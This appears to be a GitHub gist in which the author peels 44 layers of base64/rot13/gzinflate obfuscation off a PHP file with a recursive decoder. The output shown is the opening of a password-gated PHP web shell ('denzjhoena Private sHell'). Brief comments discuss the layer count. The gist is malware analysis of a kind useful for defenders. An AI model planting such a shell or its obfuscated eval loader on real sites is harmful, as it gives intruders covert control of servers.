Skip to content

Instantly share code, notes, and snippets.

Created September 19, 2011 22:34
Show Gist options
  • Save koto/1227797 to your computer and use it in GitHub Desktop.
Save koto/1227797 to your computer and use it in GitHub Desktop.
Fighting inception obfuscation
// I got this file once
eval(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
// obviously I didn't want it to eval(), so to deobfuscate it i simply did:
print(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
$ php 2.php
$ oh crap
-bash: oh: command not found
$ php 2.php > 3.php
$ joe 3.php
$ php 3.php
Friggin inceptions! there might be many of them...
// and this is how you handle this
function t($code) {
echo "."; // just to detect how many inceptions there were
$code = str_rot13(base64_decode($code));
$code = gzinflate($code);
$m = array();
if (preg_match('/str_rot13\(base64_decode\(\'(.+)\'\)/', $code, $m)) {
return t($m[1]);
return $code;
$code = 'HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=';
$ php deception.php | head
............................................ // 44 inceptions!
@session_start();@set_time_limit(0);@$pass = $_POST['pass'];$chk_login = true;$password = "tampan";if($pass == $password){$_SESSION['nst'] = "$pass";}if($chk_login == true){if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password){die("<title>.::[ Yogyacarderlink Area ]::.</title><body style=margin:0px;><table border=0 cellpadding=0 cellspacing=0 width=100% height=100% bgcolor=black><tr><td valign=middle align=center><table cellpadding=2 cellspacing=2 width=100 bgcolor=black style='border:1px solid #FFFF00;'><tr><td><table width=100 bgcolor=black style='border:1px dashed #FFFF00;'><tr><td><form method=post><font size=1 face=verdana color=white><b><center>-:: Wellcome to Private sHell ::-</center></b><hr style='border:1px dashed #FFFF00;'><center><input type=password name=pass size=30><br><br><input type=submit value=GO style='background-color: #000000; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: #CCCCCC; border-right-color: #999999; border-bottom-color: #999999; border-left-color: #CCCCCC; color: #FFFFFF;'></center></form><b>Host :</b> ".$_SERVER["HTTP_HOST"]."<br><b>IP :</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br><b>Your IP :</b> ".$_SERVER["REMOTE_ADDR"]."</font></td></tr></table></tr></td></table></td></tr></table></body>");}}$language='eng';error_reporting(0);set_magic_quotes_runtime(0);@set_time_limit(0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);$safe_mode = @ini_get('safe_mode');$version = "denzjhoena Private sHell";if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;$_SERVER = &$HTTP_SERVER_VARS;}if (@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}foreach ($_SERVER as $k=>$v){$_SERVER[$k] = stripslashes($v);}}
$head = '
<title>[ ? ] denzjhoena shell [ ? ]</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
tr {
Copy link

so, that's 44 layers total, not including the two attempts at the beginning?

also, they didn't try to change the obfuscation methods throughout? that's surprising.

Copy link

koto commented Sep 20, 2011

yeah, 44 in total, all steps were the same.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment